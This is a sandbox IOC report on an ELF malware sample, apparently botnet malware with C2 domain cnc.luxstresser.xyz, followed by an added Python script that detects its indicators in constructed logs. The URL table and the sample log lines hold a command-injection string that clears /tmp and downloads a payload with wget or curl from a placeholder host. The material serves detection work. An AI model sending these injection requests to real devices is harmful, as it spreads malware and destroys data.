IOC Report
file1

Files

File Path | Type | Category | Malicious
file1 | ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/var/cache/motd-news | ASCII text | dropped |

Note: /var/cache/motd-news is the cache file written by Ubuntu's /etc/update-motd.d/50-motd-news, and the dash, cat, head -n 10, tr -d, cut -c -80 and rm -f chain in the Processes table (together with the ubuntu.com URL in the URLs table) is the text-sanitising pipeline that script runs on login. Treat those entries, like the xfce4-panel, xfconfd and dbus-daemon rows, as background activity of the sandbox's Ubuntu guest rather than behaviour of file1; the sample's own activity is the /tmp/file1 process group and the network indicators.

Processes

Path | Cmdline | Malicious
/usr/bin/dash | n/a |
/usr/bin/cat | cat /tmp/tmp.bhkKqn6VLL |
/usr/bin/dash | n/a |
/usr/bin/head | head -n 10 |
/usr/bin/dash | n/a |
/usr/bin/tr | tr -d \000-\011\013\014\016-\037 |
/usr/bin/dash | n/a |
/usr/bin/cut | cut -c -80 |
/usr/bin/dash | n/a |
/usr/bin/cat | cat /tmp/tmp.bhkKqn6VLL |
/usr/bin/dash | n/a |
/usr/bin/head | head -n 10 |
/usr/bin/dash | n/a |
/usr/bin/tr | tr -d \000-\011\013\014\016-\037 |
/usr/bin/dash | n/a |
/usr/bin/cut | cut -c -80 |
/usr/bin/dash | n/a |
/usr/bin/rm | rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0 |
/tmp/file1 | /tmp/file1 |
/tmp/file1 | n/a |
/tmp/file1 | n/a |
/tmp/file1 | n/a |
/tmp/file1 | n/a |
/tmp/file1 | n/a |
/tmp/file1 | n/a |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear" |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)" |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system" |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display" |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | n/a |
/usr/sbin/xfpm-power-backlight-helper | /usr/sbin/xfpm-power-backlight-helper --get-max-brightness |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel" |
/usr/bin/xfce4-panel | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions" |
/usr/bin/dbus-daemon | n/a |
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd | /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd |
(31 further processes not shown)

URLs

Name | IP | Malicious
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ | 97.65.142.24 | malicious
http://schemas.xmlsoap.org/soap/encoding/ | unknown |
https://ubuntu.com/blog/microk8s-memory-optimisation | unknown |
http://schemas.xmlsoap.org/soap/envelope/ | unknown |

Note: the flagged URL is a command-injection request in which "+" is the URL encoding of a space, so the query decodes to "cd /tmp;rm -rf *;wget " followed by whatever payload location the sender appends; the usable indicator is the request path and decoded query, not the 127.0.0.1 host shown here. The two schemas.xmlsoap.org entries are SOAP XML namespace identifiers, which point to a SOAP request body carried by the sample rather than to hosts it contacts, so they are not meaningful blocklist entries.

Domains

Name | IP | Malicious
cnc.luxstresser.xyz | unknown | malicious

IPs

IP | Domain | Country | Malicious
151.226.166.50 | unknown | United Kingdom |
14.228.128.141 | unknown | Viet Nam |
197.59.229.32 | unknown | Egypt |
41.35.35.134 | unknown | Egypt |
210.165.251.143 | unknown | Japan |
134.120.216.174 | unknown | United States |
168.222.253.185 | unknown | United States |
156.92.15.66 | unknown | United States |
197.136.25.2 | unknown | Kenya |
41.99.68.177 | unknown | Algeria |
74.64.23.25 | unknown | United States |
86.240.156.164 | unknown | France |
41.94.163.82 | unknown | Mozambique |
41.106.43.128 | unknown | Algeria |
205.175.95.64 | unknown | United States |
197.217.236.118 | unknown | Angola |
161.164.218.240 | unknown | United States |
130.205.38.203 | unknown | United States |
178.218.134.59 | unknown | Romania |
208.67.236.151 | unknown | United States |
160.100.160.201 | unknown | United Kingdom |
156.254.119.6 | unknown | Seychelles |
73.152.94.189 | unknown | United States |
162.115.86.71 | unknown | United States |
175.108.35.207 | unknown | Japan |
217.22.110.121 | unknown | Spain |
41.68.48.244 | unknown | Egypt |
24.33.86.89 | unknown | United States |
161.46.177.71 | unknown | United States |
60.19.228.233 | unknown | China |
170.218.220.32 | unknown | United States |
197.191.38.219 | unknown | Ghana |
133.0.206.81 | unknown | Japan |
41.145.207.246 | unknown | South Africa |
188.173.82.208 | unknown | Romania |
197.214.155.167 | unknown | Congo |
197.73.132.136 | unknown | South Africa |
205.245.72.43 | unknown | United States |
197.143.201.73 | unknown | Algeria |
27.21.41.20 | unknown | China |
19.112.97.205 | unknown | United States |
87.222.194.121 | unknown | Spain |
217.156.198.183 | unknown | United Kingdom |
206.114.194.64 | unknown | United States |
190.74.207.8 | unknown | Venezuela |
179.101.227.73 | unknown | Brazil |
34.0.71.110 | unknown | United States |
45.141.18.24 | unknown | Netherlands |
156.241.11.81 | unknown | Seychelles |
162.237.115.197 | unknown | United States |
197.234.167.159 | unknown | South Africa |
168.11.235.136 | unknown | United States |
60.53.67.215 | unknown | Malaysia |
47.228.85.29 | unknown | United States |
66.81.23.243 | unknown | United States |
41.77.181.142 | unknown | Algeria |
133.9.169.38 | unknown | Japan |
73.105.58.29 | unknown | United States |
152.116.148.10 | unknown | United States |
147.48.77.176 | unknown | United States |
195.164.130.163 | unknown | Poland |
27.236.188.140 | unknown | Korea Republic of |
41.25.211.135 | unknown | South Africa |
109.145.152.71 | unknown | United Kingdom |
107.128.43.13 | unknown | United States |
191.92.238.169 | unknown | Colombia |
8.129.155.155 | unknown | Singapore |
204.85.103.204 | unknown | United States |
199.130.247.154 | unknown | United States |
156.192.115.130 | unknown | Egypt |
76.12.107.141 | unknown | United States |
49.100.27.192 | unknown | Japan |
152.83.207.143 | unknown | Australia |
153.246.205.122 | unknown | Japan |
85.211.188.113 | unknown | United Kingdom |
160.120.31.172 | unknown | Cote D'ivoire |
95.23.230.97 | unknown | Spain |
142.193.218.70 | unknown | Canada |
41.138.141.89 | unknown | Mauritania |
41.35.57.70 | unknown | Egypt |
13.65.160.209 | unknown | United States |
146.211.32.105 | unknown | Finland |
197.12.31.210 | unknown | Tunisia |
197.231.80.95 | unknown | Gabon |
105.1.204.215 | unknown | South Africa |
156.16.3.222 | unknown | unknown |
47.152.237.217 | unknown | United States |
197.104.77.51 | unknown | South Africa |
8.159.102.86 | unknown | Singapore |
197.217.236.147 | unknown | Angola |
197.207.206.191 | unknown | Algeria |
156.3.205.253 | unknown | United States |
39.123.64.75 | unknown | Korea Republic of |
197.235.33.63 | unknown | Mozambique |
62.186.69.39 | unknown | European Union |
197.251.50.178 | unknown | Sudan |
41.69.166.172 | unknown | Egypt |
169.108.126.83 | unknown | United States |
82.51.56.243 | unknown | Italy |
54.50.233.185 | unknown | United States |
(90 further IPs not shown)

Note: the IP table records hosts the sample contacted during the run; it gives no port, direction or payload, and none of the entries is flagged malicious. A list this long and this geographically scattered, with no resolved domains, does not by itself distinguish attacker infrastructure from hosts the sample probed, so weight these entries lower than the C2 domain and the exploit request pattern when building detections.
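The following is an added example, not part of the sandbox report, showing how the network indicators from the URLs, Domains and IPs tables above can be turned into detection logic run over log lines. The HTTP access-log and dnsmasq-style DNS lines it scans are constructed for the example; the "command chain" regex is an assumption that generalises the one injection string in the report to any target directory and any of wget, curl or tftp as the fetcher; and only three of the report's IPs are included, with IP hits deliberately scored low for the reason given in the note above.

```python
"""Match the report's network IOCs against constructed log lines.

Added example: the sample log lines are constructed, and CMD_CHAIN_RE is an
assumed generalisation of the single injection string in the report.
"""
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# IOCs copied from the report tables.
C2_DOMAIN = "cnc.luxstresser.xyz"
EXPLOIT_URL = "http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+"
# Three of the contacted IPs from the IP table; the full table is much longer.
CONTACTED_IPS = {ipaddress.ip_address(s) for s in
                 ("151.226.166.50", "14.228.128.141", "45.141.18.24")}

# Decode the injection string once: the "+" in the query are URL-encoded spaces.
_parts = urlsplit(EXPLOIT_URL)
EXPLOIT_PATH = _parts.path                 # "/shell"
EXPLOIT_CMD = unquote_plus(_parts.query)   # "cd /tmp;rm -rf *;wget "

# Assumed generalisation of the decoded chain: cd <dir>; rm -rf *; <fetcher>.
CMD_CHAIN_RE = re.compile(
    r"\bcd\s+[^\s;]+\s*;\s*rm\s+-rf\s+\*\s*;\s*(?:wget|curl|tftp)\b")

# Combined-log-format request line: client ... "METHOD target HTTP/x".
_HTTP_REQ_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# dnsmasq-style query line: query[TYPE] name from client.
_DNS_RE = re.compile(
    r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)")


def _is_c2_name(name):
    """Exact match or subdomain of the C2 domain; lookalike suffixes do not match."""
    name = name.lower().rstrip(".")
    return name == C2_DOMAIN or name.endswith("." + C2_DOMAIN)


def scan_http_line(line):
    """Return a hit dict for an exploit request, or None."""
    m = _HTTP_REQ_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    cmd = unquote_plus(target.query)       # handles both "+" and "%20"
    if target.path == EXPLOIT_PATH and cmd.startswith(EXPLOIT_CMD):
        return {"kind": "exploit-url", "confidence": "high",
                "client": m.group("client"), "decoded": cmd}
    if CMD_CHAIN_RE.search(cmd):
        return {"kind": "cmd-chain", "confidence": "medium",
                "client": m.group("client"), "decoded": cmd}
    return None


def scan_dns_line(line):
    """Return a hit dict for a lookup of the C2 domain or a subdomain, or None."""
    m = _DNS_RE.search(line)
    if not m or not _is_c2_name(m.group("name")):
        return None
    return {"kind": "c2-domain", "confidence": "high",
            "client": m.group("client"), "name": m.group("name")}


def scan_ip(addr):
    """IP-table hits are low confidence: the report records contact, not direction."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    if ip in CONTACTED_IPS:
        return {"kind": "contacted-ip", "confidence": "low", "ip": str(ip)}
    return None


def scan(http_lines, dns_lines):
    """Run both scanners and return all hits, HTTP hits first."""
    hits = [h for h in map(scan_http_line, http_lines) if h]
    hits += [h for h in map(scan_dns_line, dns_lines) if h]
    return hits


# Constructed sample lines (not taken from the report).
SAMPLE_HTTP = [
    '198.51.100.7 - - [01/May/2024:12:00:01 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://198.51.100.9/x86 HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.8 - - [01/May/2024:12:00:02 +0000] "GET /cgi-bin/run?cd%20/var/run;rm%20-rf%20*;curl%20http://198.51.100.9/arm HTTP/1.1" 200 0 "-" "-"',
    '10.0.0.5 - - [01/May/2024:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]
SAMPLE_DNS = [
    "May  1 12:00:04 dnsmasq[812]: query[A] cnc.luxstresser.xyz from 10.0.0.23",
    "May  1 12:00:05 dnsmasq[812]: query[A] ubuntu.com from 10.0.0.23",
    "May  1 12:00:06 dnsmasq[812]: query[A] update.cnc.luxstresser.xyz from 10.0.0.24",
    "May  1 12:00:07 dnsmasq[812]: query[A] cnc.luxstresser.xyz.example from 10.0.0.25",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_HTTP, SAMPLE_DNS):
        print(hit)
    print(scan_ip("45.141.18.24"))
```

The HTTP scanner decodes the query before matching so that a probe sent with "%20" instead of "+" still hits, and it scores the exact report string higher than the generalised chain; the DNS scanner anchors on the domain boundary so that a lookalike such as cnc.luxstresser.xyz.example is not counted.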